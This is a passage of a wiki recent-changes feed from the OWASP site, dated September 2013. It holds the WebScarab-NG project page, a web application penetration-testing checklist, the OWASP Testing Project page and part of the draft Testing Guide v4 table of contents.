We can see that the user tried to change the method from "POST" to "PROST". WebScarab-NG has no idea how to execute a "PROST" method, and so provides an error message to inform the user. Additionally, the OK button is automatically disabled, until the error is corrected.

==Obtaining WebScarab-NG==

WebScarab-NG is distributed via Google Code, and can be obtained [https://code.google.com/p/webscarab-ng/downloads/list here].

After extraction of files user need to run following command:
java -jar WebScarab-ng-X.X.X.one-jar.jar
where X.X.X is downloaded version or use one of scripts (start.sh for Linux, start.bat for Windows).

==Technical information==

Technical information for those interested in digging into it can be found [[ OWASP WebScarab NG Project Technical Info | here]].

This page lists the [[OWASP_WebScarab_Differences_%28Classic_vs_NG%29 | differences between WebScarab Classic and WebScarab NG]], including a ToDo list of work still to be done on WebScarab NG.

==Tips & Tricks==

WebScarab NG already contains a lot of functionality but some of them are well hidden beneath the GUI and nowhere documented.
A list of such functions can be found in the [[OWASP_WebScarab_NG_Tips_&_Tricks|Tips & Tricks of WebScarab NG]] section.

==Bugs==

Any found bugs should be reported via [https://code.google.com/p/webscarab-ng/issues/list WebScarab NG Google Code issues page]. Such mechanism allows us to keep track of all found problems so we can WebScarab-NG better.

==Feedback==

If you have any comments or suggestions for WebScarab-NG, please feel free to post them on [https://code.google.com/p/webscarab-ng/issues/list WebScarab NG Google Code issues page] or send them to the [http://lists.owasp.org/mailman/listinfo/owasp-webscarab OWASP WebScarab mailing list]

Your feedback is much appreciated, and will be carefully considered for future releases of WebScarab-NG.

==Project Contributors==

The WebScarab-NG project is run by Daniel Brzozowski. He can be contacted at [[File:Db.png]].

==== Project About ====
{{:Projects/OWASP WebScarab NG Project | Project About}}

__NOTOC__ <headertabs />

[[Category:OWASP_Project|WebScarab NG Project]]
[[Category:OWASP_Tool]]
[[Category:OWASP_Download]]
[[Category:OWASP_Alpha_Quality_Tool]]

Talk:Review webpage comments and metadata for information leakage (OTG-INFO-005)

2013-09-18T01:16:10Z

Glenn 'devalias' Grant: Started 'Include Specific Information About Reviewing Comments'

== Include Specific Information About Reviewing Comments ==

I think it's important to include specific details about reviewing page comments (html, javascript, css, etc) for sensitive details here in addition to the meta tags. [[User:Glenn 'devalias' Grant|Glenn 'devalias' Grant]] ([[User talk:Glenn 'devalias' Grant|talk]]) 20:16, 17 September 2013 (CDT)

Testing Checklist

2013-09-17T23:41:32Z

Glenn 'devalias' Grant: Converted 'Information Gathering' to use wiki table style (initial)

{{Template:OWASP Testing Guide v4}}

The following is the list of controls to test during the assessment:

{|
|colspan="4" style="text-align:center; font-weight: bold;"| Information Gathering
|-
! Category !! Ref. Number !! Test Name !! Vulnerability
|-
| OWASP-IG-001 || 4.2.1 || Spiders, Robots and Crawlers || N.A.
|-
| OWASP-IG-002 || 4.2.2 || Search Engine Discovery/Reconnaissance || N.A.
|-
| OWASP-IG-003 || 4.2.3 || Identify application entry points || N.A.
|-
| OWASP-IG-004 || 4.2.4 || Testing for Web Application Fingerprint || N.A.
|-
| OWASP-IG-005 || 4.2.5 || Application Discovery || N.A.
|-
| OWASP-IG-006 || 4.2.6 || Analysis of Error Codes || Information Disclosure
|}

'''Configuration Management Testing '''

OWASP-CM-001 - 4.3.1 SSL/TLS Testing (SSL Version, Algorithms, Key length, Digital Cert. Validity) - SSL Weakness

OWASP-CM-002 - 4.3.2 DB Listener Testing - DB Listener weak

OWASP-CM-003 - 4.3.3 Infrastructure Configuration Management Testing - Infrastructure Configuration management weakness

OWASP-CM-004 - 4.3.4 Application Configuration Management Testing - Application Configuration management weakness

OWASP-CM-005 - 4.3.5 Testing for File Extensions Handling - File extensions handling

OWASP-CM-006 - 4.3.6 Old, backup and unreferenced files - Old, backup and unreferenced files

OWASP-CM-007 - 4.3.7 Infrastructure and Application Admin Interfaces - Access to Admin interfaces

OWASP-CM-008 - 4.3.8 Testing for HTTP Methods and XST - HTTP Methods enabled, XST permitted, HTTP Verb

'''Authentication Testing '''

OWASP-AT-001 - 4.4.1 Credentials transport over an encrypted channel - Credentials transport over an encrypted channel

OWASP-AT-002 - 4.4.2 Testing for user enumeration - User enumeration

OWASP-AT-003 - 4.4.3 Testing for Guessable (Dictionary) User Account - Guessable user account

OWASP-AT-004 - 4.4.4 Brute Force Testing - Credentials Brute forcing

OWASP-AT-005 - 4.4.5 Testing for bypassing authentication schema - Bypassing authentication schema

OWASP-AT-006 - 4.4.6 Testing for vulnerable remember password and pwd reset - Vulnerable remember password, weak pwd reset

OWASP-AT-007 - 4.4.7 Testing for Logout and Browser Cache Management - - Logout function not properly implemented, browser
cache weakness

OWASP-AT-008 - 4.4.8 Testing for CAPTCHA - Weak Captcha implementation

OWASP-AT-009 - 4.4.9 Testing Multiple Factors Authentication - Weak Multiple Factors Authentication

OWASP-AT-010 - 4.4.10 Testing for Race Conditions - Race Conditions vulnerability

'''Session Management '''

OWASP-SM-001 - 4.5.1 Testing for Session Management Schema - Bypassing Session Management Schema, Weak Session Token

OWASP-SM-002 - 4.5.2 Testing for Cookies attributes - Cookies are set not ‘HTTP Only’, ‘Secure’, and no time validity

OWASP-SM-003 - 4.5.3 Testing for Session Fixation - Session Fixation

OWASP-SM-004 - 4.5.4 Testing for Exposed Session Variables - Exposed sensitive session variables

OWASP-SM-005 - 4.5.5 Testing for CSRF - CSRF

'''Authorization Testing '''

OWASP-AZ-001 - 4.6.1 Testing for Path Traversal - Path Traversal

OWASP-AZ-002 - 4.6.2 Testing for bypassing authorization schema - Bypassing authorization schema

OWASP-AZ-003 - 4.6.3 Testing for Privilege Escalation - Privilege Escalation

'''Business logic testing '''

OWASP-BL-001 - 4.7 Testing for Business Logic - Bypassable business logic

'''Data Validation Testing '''

OWASP-DV-001 - 4.8.1 Testing for Reflected Cross Site Scripting - Reflected XSS

OWASP-DV-002 - 4.8.2 Testing for Stored Cross Site Scripting - Stored XSS

OWASP-DV-003 - 4.8.3 Testing for DOM based Cross Site Scripting - DOM XSS

OWASP-DV-004 - 4.8.4 Testing for Cross Site Flashing - Cross Site Flashing

OWASP-DV-005 - 4.8.5 SQL Injection - SQL Injection

OWASP-DV-006 - 4.8.6 LDAP Injection - LDAP Injection

OWASP-DV-007 - 4.8.7 ORM Injection - ORM Injection

OWASP-DV-008 - 4.8.8 XML Injection - XML Injection

OWASP-DV-009 - 4.8.9 SSI Injection - SSI Injection

OWASP-DV-010 - 4.8.10 XPath Injection - XPath Injection

OWASP-DV-011 - 4.8.11 IMAP/SMTP Injection - IMAP/SMTP Injection

OWASP-DV-012 - 4.8.12 Code Injection - Code Injection

OWASP-DV-013 - 4.8.13 OS Commanding - OS Commanding

OWASP-DV-014 - 4.8.14 Buffer overflow - Buffer overflow

OWASP-DV-015 - 4.8.15 Incubated vulnerability - Incubated vulnerability

OWASP-DV-016 - 4.8.16 Testing for HTTP Splitting/Smuggling - HTTP Splitting, Smuggling

'''Denial of Service Testing '''

OWASP-DS-001 - 4.9.1 Testing for SQL Wildcard Attacks - SQL Wildcard vulnerability

OWASP-DS-002 - 4.9.2 Locking Customer Accounts - Locking Customer Accounts

OWASP-DS-003 - 4.9.3 Testing for DoS Buffer Overflows - Buffer Overflows

OWASP-DS-004 - 4.9.4 User Specified Object Allocation - User Specified Object Allocation

OWASP-DS-005 - 4.9.5 User Input as a Loop Counter - User Input as a Loop Counter

OWASP-DS-006 - 4.9.6 Writing User Provided Data to Disk - Writing User Provided Data to Disk

OWASP-DS-007 - 4.9.7 Failure to Release Resources - Failure to Release Resources

OWASP-DS-008 - 4.9.8 Storing too Much Data in Session - Storing too Much Data in Session

'''Web Services Testing '''

OWASP-WS-001 - 4.10.1 WS Information Gathering - N.A.

OWASP-WS-002 - 4.10.2 Testing WSDL - WSDL Weakness

OWASP-WS-003 - 4.10.3 XML Structural Testing - Weak XML Structure

OWASP-WS-004 - 4.10.4 XML content-level Testing - XML content-level

OWASP-WS-005 - 4.10.5 HTTP GET parameters/REST Testing - WS HTTP GET parameters/REST

OWASP-WS-006 - 4.10.6 Naughty SOAP attachments - WS Naughty SOAP attachments

OWASP-WS-007 - 4.10.7 Replay Testing - WS Replay Testing

'''Ajax Testing '''

OWASP-AJ-001 - 4.11.1 AJAX Vulnerabilities - N.A.

OWASP-AJ-002 - 4.11.2 AJAX Testing - AJAX weakness

OWASP Testing Guide Table of Contents

2013-09-17T23:27:33Z

Glenn 'devalias' Grant: Changed V2 to V3, Redirect to v3

#REDIRECT [[OWASP_Testing_Guide_v3_Table_of_Contents]]

Note: This page is not in use any more since it contained the 1st version of the OWASP Testing guide

PLEASE, REFER TO THIS URL FOR THE TESTING GUIDE V3:
http://www.owasp.org/index.php/OWASP_Testing_Guide_v3_Table_of_Contents

User:Glenn 'devalias' Grant

2013-09-17T23:17:50Z

Glenn 'devalias' Grant: Added advisories (Symantec Web Gateway XSS, Cloudflare XSS)

Developer, part time security researcher, ethical hacker, geek.

== Find me around the web ==

* '''Tech Blog''' http://blog.devalias.net/
* '''Website''' http://www.devalias.net/
* '''Twitter''' https://twitter.com/_devalias
* '''Github''' https://github.com/alias1

== Advisories/Etc ==

* '''25 July 2013''' [http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20130725_00 SYM13-008 Symantec Web Gateway Security Issues]
* '''22 August 2013''' [http://seclists.org/fulldisclosure/2013/Aug/232 DAHAX-2013-001 Cloudflare XSS Vulnerability ]

User:Glenn 'devalias' Grant

2013-09-17T23:09:13Z

Glenn 'devalias' Grant: Added website, blog, twitter, github

Developer, part time security researcher, ethical hacker, geek.

== Find me around the web ==

* http://blog.devalias.net/
* http://www.devalias.net/
* https://twitter.com/_devalias
* https://github.com/alias1

OWASP Testing Project

2013-09-17T23:00:22Z

Glenn 'devalias' Grant: Add 'OWASP Breakers' template tag

{{OWASP Breakers}}
{{OWASP Book|5691953}}
{{Social Media Links}}

= New OWASP Testing Guide =

== OWASP Testing Guide v4 ==

We are writing the new guide!<br>
https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents

[http://www.owasp.org/images/b/b2/OWASP_Testing_Guide_-_OWASP_Summit_2011.pdf | Roadmap has been defined at the OWASP Summit 2011. Here you can see the last presentation we did].

= Old OWASP Testing Guides =

== OWASP Testing Guide v3 ==

16th December 2008: OWASP Testing Guide v3 is finished!<br>

*You can download the Guide in PDF [http://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf here]
*Download the presentation [https://www.owasp.org/images/2/2c/OWASP_EU_Summit_2008_OWASP_Testing_Guide_v3.ppt here]
*Browse the Testing Guide v3 on the wiki [https://www.owasp.org/index.php/OWASP_Testing_Guide_v3_Table_of_Contents here]

''''NEW: OWASP projects and resources you can use TODAY''''<br>
16th April 2010 in London, OWASP leaders deliver a course focused on the main OWASP Projects.<br>
Matteo Meucci will deliver a training course on the OWASP Testing Guide v3. <br>
More information [http://www.owasp.org/index.php/London/Training/OWASP_projects_and_resources_you_can_use_TODAY here]

Video @ FOSDEM 09: [http://fosdem.unixheads.org/2009/maintracks/owasp.ogv here]

Citations:

http://www.owasp.org/index.php/Testing_Guide_Quotes

== Overview ==

This project's goal is to create a "best practices" web application penetration testing framework which users can implement in their own organizations and a "low level" web application penetration testing guide that describes how to find certain issues.

Version 3 of the Testing Guide was released in December 2008 after going through a major upgrade through the [[OWASP Summer of Code 2008]].

= Background and Motivation =

'''History Behind Project''' The OWASP Testing guide originated in 2003 with Dan Cuthbert as one of the original editors. It was handed over to [[User:EoinKeary|Eoin Keary]] in 2005 and moved onto the new OWASP wiki when it came online. Being in a wiki is easier for people to contribute and has made updating much easier. [[User:Mmeucci|Matteo Meucci]] took on the Testing guide after Eoin and shepherded it through the version 2 and version 3 updates, which have been significant improvements.

= Project History =

== OWASP Testing Guide v3 ==

Testing Guide v3: plan (archive)

26th April 2008: Version 3 of the Testing Guide started under [[OWASP Summer of Code 2008]].

6th November 2008: Completed draft created and previewed at [[OWASP EU Summit 2008|OWASP EU Summit 2008 in Portugal]].

Final stable release in December 2008

== OWASP Testing Guide v2 ==

'''10th February 2007: The OWASP Testing Guide v2 is now published''' [[User:Mmeucci|Matteo Meucci]] (as part of his [[OWASP Autumn of Code 2006 - Projects: Testing Guide|AoC project]]) has just published the latest version of Testing guide which:

*you can read it on line on the [http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Table_of_Contents Testing Guide v2 wiki]
*or download the Guide in [http://www.owasp.org/index.php/Image:OWASP_Testing_Guide_v2_pdf.zip Adobe PDF format] or in [http://www.owasp.org/index.php/Image:OWASP_Testing_Guide_v2_doc.zip Ms Doc format]

'''OWASP Testing Guide v2 in Spanish:''' Now you can get a complete translation in [http://www.owasp.org/index.php/Image:OWASP_Testing_Guide_v2_spanish_doc.zip Ms Doc format]

For comments or questions, please join the [http://lists.owasp.org/mailman/listinfo/owasp-testing OWASP Testing mailing list], read our archive and share your ideas. Alternatively you can contact [[User:EoinKeary|Eoin Keary]] or [[User:Mmeucci|Matteo Meucci]] directly.

Here you can find:

*[http://www.owasp.org/index.php/Testing_Guide_Quotes The OWASP Testing Guide 'Quotes']
*[http://www.owasp.org/index.php/OWASP_Testing_Guide_Presentations Testing Guide presentations]

= Related =

'''OWASP Testing Guide (v2+v3) Report Generator''' is found at [http://yehg.net/lab/#wasarg http://yehg.net/lab/#wasarg].

'''THE OWASP Testing Project Live CD''' The OWASP testing project is currently implementing an Application security Live CD. <br> LabRat Version 0.8 Alpha is just weeks away from Beta testing*.

The aim of this CD is to have a complete testing suite on one Disk. The CD shall also contain the forthcoming OWASP Testing guide.

The Live CD now has its own section you can find it here: [http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project]

= Feedback and Participation =

We hope you find the information in the OWASP Testing project useful. Please contribute back to the project by sending your comments, questions, and suggestions to the OWASP Testing mailing list. Thanks!

To join the OWASP Testing mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-testing subscription page].

= Translations =

Thanks to the translators all around the world you can download the guide in the following languages:

* Spanish in [http://www.owasp.org/images/8/80/Gu%C3%ADa_de_pruebas_de_OWASP_ver_3.0.pdf PDF] or [http://www.owasp.org/images/d/d7/Gu%C3%ADa_de_pruebas_de_OWASP_ver_3.0.zip MS Word] formats.

* Chinese in [http://www.owasp.org/images/0/06/OWASP%E6%B5%8B%E8%AF%95%E6%8C%87%E5%8D%97%28%E4%B8%AD%E6%96%87%EF%BC%89.pdf PDF] format. (Thanks to the [http://www.owasp.org/index.php/China-Mainland China-mainland chapter].)

* Japanese in [http://www.owasp.org/images/1/1e/OTGv3Japanese.pdf PDF] format here (this is a 1st draft, final release coming soon).

= Project About =
{{:Projects/OWASP Testing Project | Project About}}

__NOTOC__
<headertabs />

[[Category:OWASP_Project|Testing Guide]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document|OWASP Stable Quality Document]]

OWASP Testing Guide v4 Table of Contents

2013-09-17T22:59:44Z

Glenn 'devalias' Grant: Add 'OWASP Breakers' template tag

{{OWASP Breakers}}
__NOTOC__

'''This is the DRAFT of the table of content of the New Testing Guide v4.'''<br>
<br>You can download the stable version v3 [http://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf here] <br>

Back to the OWASP Testing Guide Project:
http://www.owasp.org/index.php/OWASP_Testing_Project

'''Updated: 15th February 2013'''

[[ OWTGv4 Contributors list|'''Contributors List]]

----

The following is a DRAFT of the Toc based on the feedback already received.

== Table of Contents ==

==[[Testing Guide Foreword|Foreword by Eoin Keary]]==
[To review--> Eoin Keary -> Done!!]

==[[Testing Guide Frontispiece |1. Frontispiece]]==
[To review--> Mat]

'''[[Testing Guide Frontispiece|1.1 About the OWASP Testing Guide Project]]'''
[To review--> Mat]

'''[[About The Open Web Application Security Project|1.2 About The Open Web Application Security Project]]'''
[To review--> ]

==[[Testing Guide Introduction|2. Introduction]]==

'''2.1 The OWASP Testing Project'''

'''2.2 Principles of Testing'''

'''2.3 Testing Techniques Explained'''

2.4 [https://www.owasp.org/index.php/Testing_Guide_Introduction#Security_Requirements_Test_Derivation Security requirements test derivation],[https://www.owasp.org/index.php/Testing_Guide_Introduction#Functional_and_Non_Functional_Test_Requirements functional and non functional test requirements], and [https://www.owasp.org/index.php/Testing_Guide_Introduction#Test_Cases_Through_Use_and_Misuse_Cases test cases through use and misuse cases]

2.5 [https://www.owasp.org/index.php/Testing_Guide_Introduction#Security_Test_Data_Analysis_and_Reporting Security test data analysis and reporting: root cause identification and business/role case test data reporting]

==[[The OWASP Testing Framework|3. The OWASP Testing Framework]]==

'''3.1. Overview'''

'''3.2. Phase 1: Before Development Begins '''

'''3.3. Phase 2: During Definition and Design'''

'''3.4. Phase 3: During Development'''

'''3.5. Phase 4: During Deployment'''

'''3.6. Phase 5: Maintenance and Operations'''

'''3.7. A Typical SDLC Testing Workflow '''

==[[Web Application Penetration Testing |4. Web Application Penetration Testing ]]==

[[Testing: Introduction and objectives|'''4.1 Introduction and Objectives''']] [To review--> Mat]

[[Testing Checklist| 4.1.1 Testing Checklist]] [To review at the end of brainstorming --> Mat]

[[Testing Information Gathering|'''4.2 Information Gathering ''']]

[[Testing: Search engine discovery/reconnaissance (OWASP-IG-002)|4.2.1 Conduct Search Engine Discovery and Reconnaissance for Information Leakage (OTG-INFO-001) ]] formerly "Search Engine Discovery/Reconnaissance (OWASP-IG-002)"

[[Fingerprint Web Server (OTG-INFO-002)|4.2.2 Fingerprint Web Server (OTG-INFO-002) ]] formerly "Testing for Web Application Fingerprint (OWASP-IG-004)"

[[Testing: Spiders, Robots, and Crawlers (OWASP-IG-001)|4.2.3 Review Webserver Metafiles for Information Leakage (OTG-INFO-003) ]] formerly "Spiders, Robots and Crawlers (OWASP-IG-001)"

[[Testing for Application Discovery (OWASP-IG-005)|4.2.4 Enumerate Applications on Webserver (OTG-INFO-004) ]] formerly "Application Discovery (OWASP-IG-005)"

[[Testing Review webpage comments and metadata(OWASP-IG-007)|4.2.5 Review Webpage Comments and Metadata for Information Leakage (OTG-INFO-005) ]] formerly "Review webpage comments and metadata(OWASP-IG-007)"

[[Testing: Identify application entry points (OWASP-IG-003)|4.2.6 Identify application entry points (OTG-INFO-006) ]] formerly "Identify application entry points (OWASP-IG-003)"

[[Testing Identify application exit/handover points (OWASP-IG-008)|4.2.7 Identify application exit/handover points (OTG-INFO-007) ]] formerly "Identify application exit/handover points (OWASP-IG-008)"

[[Testing Map execution paths through application (OWASP-IG-009)|4.2.8 Map execution paths through application (OTG-INFO-008)]] formerly "Map execution paths through application (OWASP-IG-009)"

[[Fingerprint Web Application Framework (OTG-INFO-009)|4.2.9 Fingerprint Web Application Framework (OTG-INFO-009) ]] formerly "Testing for Web Application Fingerprint (OWASP-IG-010)" '''Ready to be reviewed'''

[[Testing for Web Application (OTG-INFO-011)|4.2.10 Fingerprint Web Application (OTG-INFO-010) ]] formerly "Testing for Web Application Fingerprint (OWASP-IG-010)"

[[Map Network and Application Architecture (OTG-INFO-012)|4.2.11 Map Network and Application Architecture (OTG-INFO-011) ]] formerly "Testing for Infrastructure Configuration Management Testing weakness (OWASP-CM-001)"

[[Testing for configuration management|'''4.3 Configuration and Deploy Management Testing ''']]

[[Testing for infrastructure configuration management (OWASP-CM-003)|4.3.1 Test Network/Infrastructure Configuration (OTG-CONFIG-001) ]] formerly "Testing for Infrastructure Configuration Management Testing weakness (OWASP-CM-001)"

[[Testing for application configuration management (OWASP-CM-004)|4.3.2 Test Application Platform Configuration (OTG-CONFIG-002) ]] formerly "Testing for Application Configuration Management weakness (OWASP-CM-002)"

[[Testing for file extensions handling (OWASP-CM-005)|4.3.3 Test File Extensions Handling for Sensitive Information (OTG-CONFIG-003) ]] formerly "Testing for File Extensions Handling (OWASP-CM-003)"

[[Testing for Old, Backup and Unreferenced Files (OWASP-CM-006)|4.3.4 Review Old, Backup and Unreferenced Files for Sensitive Information (OTG-CONFIG-004) ]] formerly "Old, Backup and Unreferenced Files (OWASP-CM-004)"

[[Testing for Admin Interfaces (OWASP-CM-007)|4.3.5 Enumerate Infrastructure and Application Admin Interfaces (OTG-CONFIG-005) ]] formerly "Infrastructure and Application Admin Interfaces (OWASP-CM-005)"

[[Testing for HTTP Methods and XST (OWASP-CM-008)|4.3.6 Test HTTP Methods (OTG-CONFIG-006) ]] formerly "Testing for Bad HTTP Methods (OWASP-CM-006)"

[[Testing for Database credentials/connection strings available|4.3.7 Testing for Database credentials/connection strings available (OTG-CONFIG-007) ]] formerly "Testing for Database credentials/connection strings available (OWASP-CM-007)"

[[Testing for Content Security Policy weakness|4.3.8 Test Content Security Policy (OTG-CONFIG-008) ]] formerly "Testing for Content Security Policy weakness (OWASP-CM-008)"

[[Testing for Missing HSTS header|4.3.9 Test HTTP Strict Transport Security (OTG-CONFIG-009) ]] formerly "Testing for Missing HSTS header (OWASP-CM-009)"

[[Testing for Frame Options|4.3.10 Test Frame Options (OTG-CONFIG-010) ]]

[[Testing for RIA policy files weakness|4.3.11 Test RIA cross domain policy (OTG-CONFIG-011) ]] formerly "Testing for RIA policy files weakness (OWASP-CM-010)"

[[Testing for Content Type Options|4.3.12 Test Content Type Options (OTG-CONFIG-012) ]] new

[[Testing Identity Management|'''4.4 Identity Management Testing''']]

[[Test Role Definitions (OTG-IDENT-001)|4.4.1 Test Role Definitions (OTG-IDENT-001)]] New

[[Test User Registration Process (OTG-IDENT-002)|4.4.2 Test User Registration Process (OTG-IDENT-002)]] New

[[Test Account Provisioning Process (OTG-IDENT-003)|4.4.3 Test Account Provisioning Process (OTG-IDENT-003)]] New

[[Testing for Account Enumeration and Guessable User Account (OWASP-AT-002)|4.4.4 Testing for Account Enumeration and Guessable User Account (OTG-IDENT-004) ]] formerly "Testing for Account Enumeration and Guessable User Account (OWASP-AT-002)"

[[Testing for Weak or unenforced username policy (OWASP-AT-009)| 4.4.5 Testing for Weak or unenforced username policy (OTG-IDENT-005)]] formerly "Testing for Weak or unenforced username policy (OWASP-AT-009)

[[Test Permissions of Guest/Training Accounts (OTG-IDENT-006)|4.4.6 Test Permissions of Guest/Training Accounts (OTG-IDENT-006)]] New

[[Test Account Suspension/Resumption Process (OTG-IDENT-007)|4.4.7 Test Account Suspension/Resumption Process (OTG-IDENT-007)]] New

[[Test User Deregistration Process (OTG-IDENT-008)|4.4.8 Test User Deregistration Process (OTG-IDENT-008)]] New

[[Test Account Deregistration Process (OTG-IDENT-009)|4.4.9 Test Account Deregistration Process (OTG-IDENT-009)]] New

[[Testing for authentication|'''4.5 Authentication Testing ''']]

[[Testing for Credentials Transported over an Encrypted Channel (OWASP-AT-001)|4.5.1 Testing for Credentials Transported over an Encrypted Channel (OTG-AUTHN-001)]] formerly "Testing for Credentials Transported over an Encrypted Channel (OWASP-AT-001)"

[[Testing for default credentials (OWASP-AT-003)|4.5.2 Testing for default credentials (OTG-AUTHN-002)]] formerly "Testing for default credentials (OWASP-AT-003)"

[[Testing for Weak lock out mechanism (OWASP-AT-004)|4.5.3 Testing for Weak lock out mechanism (OTG-AUTHN-003)]] formerly "Testing for Weak lock out mechanism (OWASP-AT-004)"

[[Testing for Bypassing Authentication Schema (OWASP-AT-005)|4.5.4 Testing for bypassing authentication schema (OTG-AUTHN-004)]] formerly "Testing for bypassing authentication schema (OWASP-AT-005)"

[[Testing for Vulnerable Remember Password (OWASP-AT-006)|4.5.5 Test remember password functionality (OTG-AUTHN-005)]] formerly "Testing for vulnerable remember password functionality (OWASP-AT-006)"

[[Testing for Browser cache weakness (OWASP-AT-007)|4.5.6 Testing for Browser cache weakness (OTG-AUTHN-006)]] formerly "Testing for Browser cache weakness (OWASP-AT-007)"

[[Testing for Weak password policy (OWASP-AT-008)|4.5.7 Testing for Weak password policy (OTG-AUTHN-007)]] formerly "Testing for Weak password policy (OWASP-AT-008)"

[[Testing for Weak security question/answer (OTG-AUTHN-008)|4.5.8 Testing for Weak security question/answer (OTG-AUTHN-008)]] New! - Robert Winkel

[[Testing for weak password change or reset functionalities (OWASP-AT-011)|4.5.9 Testing for weak password change or reset functionalities (OTG-AUTHN-009)]] formerly "Testing for weak password change or reset functionalities (OWASP-AT-011)"

[[Testing for Weaker authentication in alternative channel (OTG-AUTHN-010)|4.5.10 Testing for Weaker authentication in alternative channel (OTG-AUTHN-010)]] (e.g. mobile app, IVR, help desk)

[[Testing for Authorization|'''4.6 Authorization Testing''']]

[[Test Management of Account Permissions (OTG-AUTHZ-001)|4.6.1 Test Management of Account Permissions (OTG-AUTHZ-001)]] New

[[Testing for Path Traversal (OWASP-AZ-001)|4.6.2 Testing Directory traversal/file include (OTG-AUTHZ-002)]] formerly "Testing Directory traversal/file include (OWASP-AZ-001)"

[[Testing for Bypassing Authorization Schema (OWASP-AZ-002)|4.6.3 Testing for bypassing authorization schema (OTG-AUTHZ-003)]] formerly "Testing for bypassing authorization schema (OWASP-AZ-002)"

[[Testing for Privilege escalation (OWASP-AZ-003)|4.6.4 Testing for Privilege Escalation (OTG-AUTHZ-004)]] formerly "Testing for Privilege Escalation (OWASP-AZ-003)"

[[Testing for Insecure Direct Object References (OWASP-AZ-004)|4.6.5 Testing for Insecure Direct Object References (OTG-AUTHZ-005)]] formerly "Testing for Insecure Direct Object References (OWASP-AZ-004)"

[[Testing for Failure to Restrict access to authorized resource (OWASP-AZ-005)|4.6.6 Testing for Failure to Restrict access to authorized resource (OTG-AUTHZ-006)]] formerly "Testing for Failure to Restrict access to authorized resource (OWASP-AZ-005)"

[[Test privileges of server components (OTG-AUTHZ-007)|4.6.7 Test privileges of server components (OTG-AUTHZ-007)]] (e.g. indexing service, reporting interface, file generator)

[[Test enforcement of application entry points (OTG-AUTHZ-008)|4.6.8 Test enforcement of application entry points (OTG-AUTHZ-008)]] (including exposure of objects)

[[Testing for failure to restrict access to authenticated resource(OWASP-AT-010)|4.6.9 Testing for failure to restrict access to authenticated resource (OTG-AUTHZ-009)]] formerly "Testing for failure to restrict access to authenticated resource (OWASP-AT-010)"

[[Testing for Session Management|'''4.7 Session Management Testing''']]

[[Testing for Session_Management_Schema (OWASP-SM-001)|4.7.1 Testing for Bypassing Session Management Schema (OTG-SESS-001)]] formerly "Testing for Bypassing Session Management Schema (OWASP-SM-001)"

[[Testing for cookies attributes (OWASP-SM-002)|4.7.2 Testing for Cookies attributes (OTG-SESS-002)]] formerly "Testing for Cookies attributes (OWASP-SM-002)" (Cookies are set not ‘HTTP Only’, ‘Secure’, and no time validity)

[[Testing for Session Fixation (OWASP-SM-003)|4.7.3 Testing for Session Fixation (OTG-SESS-003)]] formerly "Testing for Session Fixation (OWASP-SM-003)"

[[Testing for Exposed Session Variables (OWASP-SM-004)|4.7.4 Testing for Exposed Session Variables (OTG-SESS-004)]] formerly "Testing for Exposed Session Variables (OWASP-SM-004)"

[[Testing for CSRF (OWASP-SM-005)|4.7.5 Testing for Cross Site Request Forgery (CSRF) (OTG-SESS-005)]] formerly "Testing for Cross Site Request Forgery (CSRF) (OWASP-SM-005)"

[[Test Session Token Strength (OTG-SESS-006)|4.7.6 Test Session Token Strength (OTG-SESS-006)]]

[[Testing for logout functionality (OWASP-SM-007)|4.7.7 Testing for logout functionality (OTG-SESS-007)]] formerly "Testing for logout functionality (OWASP-SM-007)"

[[Testing for Session puzzling (OWASP-SM-008)|4.7.8 Testing for Session puzzling (OWASP-SM-008)]]

[[Test Session Timeout (OTG-SESS-008)|4.7.8 Test Session Timeout (OTG-SESS-008)]]

[[Test multiple concurrent sessions (OTG-SESS-009)|4.7.9 Test multiple concurrent sessions (OTG-SESS-009)]]

[[Testing for Data Validation|'''4.8 Data Validation Testing''']]

[[Testing for Reflected Cross site scripting (OWASP-DV-001) |4.8.1 Testing for Reflected Cross Site Scripting (OTG-INPVAL-001)]] formerly "Testing for Reflected Cross Site Scripting (OWASP-DV-001)"

[[Testing for Stored Cross site scripting (OWASP-DV-002) |4.8.2 Testing for Stored Cross Site Scripting (OTG-INPVAL-002)]] formerly "Testing for Stored Cross Site Scripting (OWASP-DV-002)"

[[Testing for HTTP Verb Tampering (OWASP-DV-003)|4.8.3 Testing for HTTP Verb Tampering (OTG-INPVAL-003)]] formerly "Testing for HTTP Verb Tampering (OWASP-DV-003)"

[[Testing for HTTP Parameter pollution (OWASP-DV-004)|4.8.4 Testing for HTTP Parameter pollution (OTG-INPVAL-004) ]] formerly "Testing for HTTP Parameter pollution (OWASP-DV-004)"

[[Testing for Unvalidated Redirects and Forwards (OWASP-DV-004)|4.8.5 Testing for Unvalidated Redirects and Forwards (OTG-INPVAL-005) ]] formerly "Testing for Unvalidated Redirects and Forwards (OWASP-DV-004)"

[[Testing for SQL Injection (OWASP-DV-005)| 4.8.6 Testing for SQL Injection (OTG-INPVAL-006)]] formerly "Testing for SQL Injection (OWASP-DV-005)" '''Ready to be reviewed'''

[[Testing for Oracle|4.8.6.1 Oracle Testing]]

[[Testing for MySQL|4.8.6.2 MySQL Testing [Ismael Gonçalves]]]

[[Testing for SQL Server|4.8.6.3 SQL Server Testing]]

[[OWASP_Backend_Security_Project_Testing_PostgreSQL|4.8.6.4 Testing PostgreSQL (from OWASP BSP) ]]

[[Testing for MS Access |4.8.6.5 MS Access Testing]]

[[Testing for NoSQL injection|4.8.6.6 Testing for NoSQL injection [New!]]]

[[Testing for LDAP Injection (OWASP-DV-006)|4.8.7 Testing for LDAP Injection (OTG-INPVAL-007)]] formerly "Testing for LDAP Injection (OWASP-DV-006)"

[[Testing for ORM Injection (OWASP-DV-007)|4.8.8 Testing for ORM Injection (OTG-INPVAL-008)]] formerly "Testing for ORM Injection (OWASP-DV-007)"

[[Testing for XML Injection (OWASP-DV-008)|4.8.9 Testing for XML Injection (OTG-INPVAL-009)]] formerly "Testing for XML Injection (OWASP-DV-008)"

